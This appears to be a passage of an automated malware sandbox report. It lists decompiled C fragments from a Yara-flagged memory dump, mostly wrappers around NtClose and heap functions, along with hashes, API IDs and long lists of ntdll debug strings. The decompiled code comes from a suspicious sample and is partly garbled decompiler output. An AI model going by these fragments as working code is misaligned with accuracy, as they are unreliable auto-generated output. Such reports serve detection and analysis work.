            • Instruction ID: c2721ea4e084a79d388e091216dcc94a475298a8aa449db6134383b78daf1f40
            • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
            • Instruction Fuzzy Hash: 7DF015B2210208AFCB14DF89CC81EEB77ADAF88754F118549BE1897241C630F810CBA4
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 68%
            			E00419E7A(void* __edx, void* __esi, intOrPtr _a4, void* _a8) {
            				long _t11;
            				void* _t15;
            
            				asm("adc dl, [ebp-0x75]");
            				_t8 = _a4;
            				_t3 = _t8 + 0x10; // 0x300
            				_t4 = _t8 + 0xc50; // 0x40a913
            				E0041A950(_t15, _a4, _t4,  *_t3, 0, 0x2c);
            				_t11 = NtClose(_a8);
            				asm("rcr byte [esi+0x5d], 1");
            				return _t11;
            			}






            APIs
            • NtClose.NTDLL(00414D10,?,?,00414D10,00409CC3,FFFFFFFF), ref: 00419EA5
            Memory Dump Source
            • Source File: 00000003.00000002.646633088.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID: Close
            • String ID:
            • API String ID: 3535843008-0
            • Opcode ID: 33774ad53f0ed888670ba2349acc016819d85ed5a4db1b4e8b37f078915f6f62
            • Instruction ID: 1795d3674bcaf6965dc5f2cc92f9e4ff899195fe5457ea5e7829a056c149e73c
            • Opcode Fuzzy Hash: 33774ad53f0ed888670ba2349acc016819d85ed5a4db1b4e8b37f078915f6f62
            • Instruction Fuzzy Hash: FBE08C752001006FD720DBA8DC96EEB7F29EF48360F194499F9AC9B243C531E551CBA0
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 82%
            			E00419E80(void* __esi, intOrPtr _a4, void* _a8) {
            				long _t8;
            				void* _t11;
            
            				_t5 = _a4;
            				_t2 = _t5 + 0x10; // 0x300
            				_t3 = _t5 + 0xc50; // 0x40a913
            				E0041A950(_t11, _a4, _t3,  *_t2, 0, 0x2c);
            				_t8 = NtClose(_a8);
            				asm("rcr byte [esi+0x5d], 1");
            				return _t8;
            			}






            APIs
            • NtClose.NTDLL(00414D10,?,?,00414D10,00409CC3,FFFFFFFF), ref: 00419EA5
            Memory Dump Source
            • Source File: 00000003.00000002.646633088.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID: Close
            • String ID:
            • API String ID: 3535843008-0
            • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
            • Instruction ID: abd226b249efdbe90954a2e5a1f5a103ee35f8531edac2b51595525400ebd06d
            • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
            • Instruction Fuzzy Hash: FED01776200214ABD710EB99CC86EE77BACEF48760F15449ABA5C9B242C530FA5086E0
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID: InitializeThunk
            • String ID:
            • API String ID: 2994545307-0
            • Opcode ID: ef7db263f8ef96a4ac177464b3941e61bd1081335146c8517a27c9e88e3d9f1f
            • Instruction ID: 08e4cd19546d3bd447dd4526378442c1ff09dcb030cbca0bc961e9afb5ebac13
            • Opcode Fuzzy Hash: ef7db263f8ef96a4ac177464b3941e61bd1081335146c8517a27c9e88e3d9f1f
            • Instruction Fuzzy Hash: D190027121108842D2106169940474A000597D0342F55D421B4414658DC6D588A1B161
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID: InitializeThunk
            • String ID:
            • API String ID: 2994545307-0
            • Opcode ID: 440641afae8cfea189d9ce4d27d47987ec5888f23bd6004618cb52de6e62a034
            • Instruction ID: d35f09fd723b5e0fc727402335f86f0ccb027a0828c8e239d579429ca5bb85cb
            • Opcode Fuzzy Hash: 440641afae8cfea189d9ce4d27d47987ec5888f23bd6004618cb52de6e62a034
            • Instruction Fuzzy Hash: AF90027121100842D2807169540464A000597D1342F91D025B0015654DCA558A69B7E1
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID: InitializeThunk
            • String ID:
            • API String ID: 2994545307-0
            • Opcode ID: cef44cd72a43edd33dd758a422ebccb973acc75054fc9fec4ad182915803164e
            • Instruction ID: 28958e3a7345ae037eb1f22ac6946906b7cc3b05f9de5d2c3d2373b56091ebe1
            • Opcode Fuzzy Hash: cef44cd72a43edd33dd758a422ebccb973acc75054fc9fec4ad182915803164e
            • Instruction Fuzzy Hash: 1A90027121100453D21161695504707000997D0382F91D422B0414558DD6968962F161
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 93%
            			E00409A80(intOrPtr _a4) {
            				intOrPtr _v8;
            				char _v24;
            				char _v284;
            				char _v804;
            				char _v840;
            				void* _t24;
            				void* _t31;
            				void* _t33;
            				void* _t34;
            				void* _t39;
            				void* _t50;
            				intOrPtr _t52;
            				void* _t53;
            				void* _t54;
            				void* _t55;
            				void* _t56;
            
            				_t52 = _a4;
            				_t39 = 0; // executed
            				_t24 = E00407E80(_t52,  &_v24); // executed
            				_t54 = _t53 + 8;
            				if(_t24 != 0) {
            					E00408090( &_v24,  &_v840);
            					_t55 = _t54 + 8;
            					do {
            						E0041B800( &_v284, 0x104);
            						E0041BE70( &_v284,  &_v804);
            						_t56 = _t55 + 0x10;
            						_t50 = 0x4f;
            						while(1) {
            							_t31 = E00414DB0(E00414D50(_t52, _t50),  &_v284);
            							_t56 = _t56 + 0x10;
            							if(_t31 != 0) {
            								break;
            							}
            							_t50 = _t50 + 1;
            							if(_t50 <= 0x62) {
            								continue;
            							} else {
            							}
            							goto L8;
            						}
            						_t9 = _t52 + 0x14; // 0xffffe055
            						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
            						_t39 = 1;
            						L8:
            						_t33 = E004080C0( &_v24,  &_v840);
            						_t55 = _t56 + 8;
            					} while (_t33 != 0 && _t39 == 0);
            					_t34 = E00408140(_t52,  &_v24); // executed
            					if(_t39 == 0) {
            						asm("rdtsc");
            						asm("rdtsc");
            						_v8 = _t34 - 0 + _t34;
            						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
            					}
            					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
            					_t20 = _t52 + 0x31; // 0x5608758b
            					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
            					return 1;
            				} else {
            					return _t24;
            				}
            			}




















            Memory Dump Source
            • Source File: 00000003.00000002.646633088.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 8cc8ad2602947109d93759c0c81a18c9a26cd20e5980a219460c89eacf67366e
            • Instruction ID: 31b1220a7bfbfd16f43a3644c83f2c17606f0388dd956b3420c92d1797c928f5
            • Opcode Fuzzy Hash: 8cc8ad2602947109d93759c0c81a18c9a26cd20e5980a219460c89eacf67366e
            • Instruction Fuzzy Hash: 202137B2D4020857CB25DA64AD42AEF73BCAB54304F04007FE949A7182F63CBE49CBA5
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E0041A020(intOrPtr _a4, void* _a8, long _a12, char _a16) {
            				void* _t10;
            				void* _t15;
            
            				E0041A950(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
            				_t4 =  &_a16; // 0x414c6f
            				_t10 = RtlAllocateHeap(_a8, _a12,  *_t4); // executed
            				return _t10;
            			}






            APIs
            • RtlAllocateHeap.NTDLL(004144F6,?,oLA,00414C6F,?,004144F6,?,?,?,?,?,00000000,00409CC3,?), ref: 0041A04D
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.646633088.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID: AllocateHeap
            • String ID: oLA
            • API String ID: 1279760036-3789366272
            • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
            • Instruction ID: 3e9cccf5f91448adbf19cee7c08a6922c38dacc77a606dc9f5f43a2a80c29887
            • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
            • Instruction Fuzzy Hash: 4BE012B1210208ABDB14EF99CC41EA777ACAF88664F118559BA185B242C630F9108AB0
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E0041A060(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
            				char _t10;
            				void* _t15;
            
            				_t3 = _a4 + 0xc74; // 0xc74
            				E0041A950(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
            				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
            				return _t10;
            			}






            APIs
            • RtlFreeHeap.NTDLL(00000060,00409CC3,?,?,00409CC3,00000060,00000000,00000000,?,?,00409CC3,?,00000000), ref: 0041A08D
            Memory Dump Source
            • Source File: 00000003.00000002.646633088.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID: FreeHeap
            • String ID:
            • API String ID: 3298025750-0
            • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
            • Instruction ID: 52797000195eaed384c72aa9dcce9225c0ea881c405841437723114bb70c3a82
            • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
            • Instruction Fuzzy Hash: AEE012B1210208ABDB18EF99CC49EA777ACAF88760F018559BA185B242C630E9108AB0
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID: InitializeThunk
            • String ID:
            • API String ID: 2994545307-0
            • Opcode ID: ebc133225b45f08709ec2b13017b5077175dab076f9a614fb0ce96a2961d3745
            • Instruction ID: 57eb72967a0576cc9f8e682aceb4822b20c24c5719fec0db515476544a9f3dfa
            • Opcode Fuzzy Hash: ebc133225b45f08709ec2b13017b5077175dab076f9a614fb0ce96a2961d3745
            • Instruction Fuzzy Hash: A0B09B719014D5C9D711D7745608717794077D0741F16C071E1020641A4778C495F5B6
            Uniqueness

            Uniqueness Score: -1.00%

            Non-executed Functions

            Strings
            • The critical section is owned by thread %p., xrefs: 00A9B3B9
            • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 00A9B38F
            • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 00A9B476
            • Go determine why that thread has not released the critical section., xrefs: 00A9B3C5
            • The resource is owned exclusively by thread %p, xrefs: 00A9B374
            • write to, xrefs: 00A9B4A6
            • The instruction at %p tried to %s , xrefs: 00A9B4B6
            • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 00A9B305
            • *** Resource timeout (%p) in %ws:%s, xrefs: 00A9B352
            • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 00A9B53F
            • *** enter .cxr %p for the context, xrefs: 00A9B50D
            • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 00A9B3D6
            • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 00A9B484
            • The resource is owned shared by %d threads, xrefs: 00A9B37E
            • *** A stack buffer overrun occurred in %ws:%s, xrefs: 00A9B2F3
            • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 00A9B39B
            • *** then kb to get the faulting stack, xrefs: 00A9B51C
            • *** An Access Violation occurred in %ws:%s, xrefs: 00A9B48F
            • a NULL pointer, xrefs: 00A9B4E0
            • read from, xrefs: 00A9B4AD, 00A9B4B2
            • This failed because of error %Ix., xrefs: 00A9B446
            • <unknown>, xrefs: 00A9B27E, 00A9B2D1, 00A9B350, 00A9B399, 00A9B417, 00A9B48E
            • an invalid address, %p, xrefs: 00A9B4CF
            • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 00A9B2DC
            • The instruction at %p referenced memory at %p., xrefs: 00A9B432
            • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 00A9B47D
            • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 00A9B314
            • *** Inpage error in %ws:%s, xrefs: 00A9B418
            • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 00A9B323
            • *** enter .exr %p for the exception record, xrefs: 00A9B4F1
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
            • API String ID: 0-108210295
            • Opcode ID: 0af893fc1c159cbfbfd85dd5ecf31c8638fa5df67ab8291d7518fb32b129ffc1
            • Instruction ID: 987f21a123f0c212b5e6477f710239a54ec9216e8919ebaf20c79a37ce5e8997
            • Opcode Fuzzy Hash: 0af893fc1c159cbfbfd85dd5ecf31c8638fa5df67ab8291d7518fb32b129ffc1
            • Instruction Fuzzy Hash: 3E810475B91200FFCF25AB15AE86D6B3B76AF86B56F01C045F0082F653D3A18801D6B6
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 00A5AAC8
            • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 00A5AC0A
            • RtlpResolveAssemblyStorageMapEntry, xrefs: 00A5AC27
            • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 00A5AAA0
            • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 00A5A8EC
            • @, xrefs: 00A5ABA3
            • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 00A5AB0E
            • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 00A5ABF3
            • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 00A5AA1A
            • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 00A5AA11
            • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 00A5AC2C
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
            • API String ID: 0-4009184096
            • Opcode ID: a1b2544941db112d140648c578058432fe80cfd2b9ddfa5007833ead7ebd0263
            • Instruction ID: 87bbb31dc924f3a7fa959fda08cf94f53b99b43087f0a0b9bac442de12852a17
            • Opcode Fuzzy Hash: a1b2544941db112d140648c578058432fe80cfd2b9ddfa5007833ead7ebd0263
            • Instruction Fuzzy Hash: 9D0260B1E402289BDB21DB14CD81BDAB7B8AF54715F4041EAEA0DA7241D7709FC8CF99
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
            • API String ID: 0-3591852110
            • Opcode ID: de477c682be9befc3ac3010afa0efc44dff36fe8d801793a04ab1096771dd58b
            • Instruction ID: 5fce10ef43fd5ba2812d7d41fea3b2eb5054614cd459a78d82b8c678b2e2aa64
            • Opcode Fuzzy Hash: de477c682be9befc3ac3010afa0efc44dff36fe8d801793a04ab1096771dd58b
            • Instruction Fuzzy Hash: 71129C306046429FDB25CF69C495BBAB7F1FF8A714F148459F48A8B682D7B4EC80CB91
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
            • API String ID: 0-1357697941
            • Opcode ID: 2f7a9a61f166e58ffb079a62860c1eded774260fb2c4ee0c5d10664745467f61
            • Instruction ID: 9ca593062a6efbab5991775d0f8aad3cd7e9daf7bd103dd7b524b710e287e4c7
            • Opcode Fuzzy Hash: 2f7a9a61f166e58ffb079a62860c1eded774260fb2c4ee0c5d10664745467f61
            • Instruction Fuzzy Hash: 19F10131A006869FCB25CF69C495BAAB7F5FF8E314F14802AF04697681C7B4ED85CB51
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: HEAP: $HEAP[%wZ]: $Invalid CommitSize parameter - %Ix$Invalid ReserveSize parameter - %Ix$May not specify Lock parameter with HEAP_NO_SERIALIZE$Specified HeapBase (%p) != to BaseAddress (%p)$Specified HeapBase (%p) invalid, Status = %lx$Specified HeapBase (%p) is free or not writable
            • API String ID: 0-2224505338
            • Opcode ID: a802d53b71f503e56f5bcc992dd465135093ad06352663166f92016668492bbc
            • Instruction ID: c58ae8ffef8bfb514b814c20ffd582470711665a9a4e2a395d6a730fc0dbecc3
            • Opcode Fuzzy Hash: a802d53b71f503e56f5bcc992dd465135093ad06352663166f92016668492bbc
            • Instruction Fuzzy Hash: 8B510733646284EFCB12DF99C896F6A73B4EB49B64F14C02EF406AB681C771DE40C612
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            • sxsisol_SearchActCtxForDllName, xrefs: 00A4D406
            • Internal error check failed, xrefs: 00A4D441, 00A4D5F2
            • !(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT), xrefs: 00A4D432
            • [%x.%x] SXS: %s - Relative redirection plus env var expansion., xrefs: 00A4D417
            • @, xrefs: 00A029C7
            • minkernel\ntdll\sxsisol.cpp, xrefs: 00A4D43C, 00A4D5ED
            • Status != STATUS_NOT_FOUND, xrefs: 00A4D5E3
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: !(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT)$@$Internal error check failed$Status != STATUS_NOT_FOUND$[%x.%x] SXS: %s - Relative redirection plus env var expansion.$minkernel\ntdll\sxsisol.cpp$sxsisol_SearchActCtxForDllName
            • API String ID: 0-761764676
            • Opcode ID: 5a9c2b883f96801f5f2988fe10dcd5931580c502d87d50a5c70ea5d3f2355c75
            • Instruction ID: d7c996daf62338731fecf7b365193d01b80af9f7e47cdfbe6ec963b2c927c895
            • Opcode Fuzzy Hash: 5a9c2b883f96801f5f2988fe10dcd5931580c502d87d50a5c70ea5d3f2355c75
            • Instruction Fuzzy Hash: 7E128F74A002299FDB24CF58D885BBEB7F5EF58714F15806AE849EB281E734EC41CB60
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$MUI$R$T${
            • API String ID: 0-2515562510
            • Opcode ID: e397e3163b7f89f91d6c3a5162d9144a4c6073a0162c8139948b457be14f64d6
            • Instruction ID: f98e0269700cfe1331219ac6d87594df6088949f1d8d5308057e41f1f52b3600
            • Opcode Fuzzy Hash: e397e3163b7f89f91d6c3a5162d9144a4c6073a0162c8139948b457be14f64d6
            • Instruction Fuzzy Hash: B1923A71E08229CFDB64CF98C880BEDB7B6BF45344F258259E859AB241DB389D85CF50
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
            • API String ID: 0-523794902
            • Opcode ID: 787977c6abec68cc2d6e83631624ede38d66fc58750565a772601ce06f7f6d1b
            • Instruction ID: b90c2853ff0d011d3450d33b5e238fef3c71592d2dc84ce37f355477ebbf1af9
            • Opcode Fuzzy Hash: 787977c6abec68cc2d6e83631624ede38d66fc58750565a772601ce06f7f6d1b
            • Instruction Fuzzy Hash: 0C42DB316087859FC715CF28D884B2ABBE5BF98704F14896DF8868B392D734ED85CB52
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            • SsHd, xrefs: 00A02EF4
            • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 00A4D758
            • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 00A4D724
            • Actx , xrefs: 00A4D76A, 00A4D7D1
            • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 00A4D809
            • RtlpFindActivationContextSection_CheckParameters, xrefs: 00A4D71F, 00A4D753
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
            • API String ID: 0-1988757188
            • Opcode ID: ee8bad55f116c152083f78da0d6cc44b364e5024d43a4d693ba82dbfa0ebc066
            • Instruction ID: 86b7098ff677e8b9a6f40a06a629f8a3d15f6f275ef838b3d373f6a954372938
            • Opcode Fuzzy Hash: ee8bad55f116c152083f78da0d6cc44b364e5024d43a4d693ba82dbfa0ebc066
            • Instruction Fuzzy Hash: 06E1E17560430A8FDB24CF28D888B2ABBF5AB88354F14462EF856CB2D1D731DD45CB92
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
            • API String ID: 0-1745908468
            • Opcode ID: cc8cc3faac25ac436564c390c58a8f3d367d34c0f10760397828483ae597c39f
            • Instruction ID: af95ffd39565117d336f5a1554c72ecfc7d998ad5ecb8bed65120916326efbb0
            • Opcode Fuzzy Hash: cc8cc3faac25ac436564c390c58a8f3d367d34c0f10760397828483ae597c39f
            • Instruction Fuzzy Hash: E191D131A016809FCB26DFA8C451BADBBF2BF8A710F18805DF4465B6D2C7329D92CB11
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: '$(null)$(null)
            • API String ID: 0-1087929977
            • Opcode ID: 8730000283683bc95b64901e37dea20531b8ac03ccb8197b4b14ccfbfe28e0fa
            • Instruction ID: dff098367fa6b6436d13b834d4fcad11237d71dfc09fdd207785c244d302809c
            • Opcode Fuzzy Hash: 8730000283683bc95b64901e37dea20531b8ac03ccb8197b4b14ccfbfe28e0fa
            • Instruction Fuzzy Hash: 9932A3F1E002289BDB348F28CD847AAB7B5AB44314F5481EDF659A7281D7B48EC5CF58
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 00A5A7A7
            • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 00A5A7C7
            • RtlGetAssemblyStorageRoot, xrefs: 00A5A768, 00A5A7A2, 00A5A7C2
            • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 00A5A788
            • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 00A5A780
            • SXS: %s() passed the empty activation context, xrefs: 00A5A76D
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
            • API String ID: 0-861424205
            • Opcode ID: cd384eb047a08e6eb6540d3520c450127a9c79f148b7606c7651e9ce6124ea0d
            • Instruction ID: b05d1a84f0ee841e3cfa035a26ec7d2f2dccce05588ae0256af351b7ed1d3756
            • Opcode Fuzzy Hash: cd384eb047a08e6eb6540d3520c450127a9c79f148b7606c7651e9ce6124ea0d
            • Instruction Fuzzy Hash: 74313836F80224BBEB209B55CC42FAAB779EF65B65F048155FD14B7281D2B09E00C7E2
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: $ $Internal error check failed$Status != STATUS_SXS_SECTION_NOT_FOUND$minkernel\ntdll\sxsisol.cpp
            • API String ID: 0-3393094623
            • Opcode ID: 1c7425bbb65723983339642934ee3d881abc0d13ab169b496fe45999d8793a41
            • Instruction ID: 4f1c20132b39c98e8ab2b3b3d978efc5f4c12b59a38b468c41c94bfb18ef8afd
            • Opcode Fuzzy Hash: 1c7425bbb65723983339642934ee3d881abc0d13ab169b496fe45999d8793a41
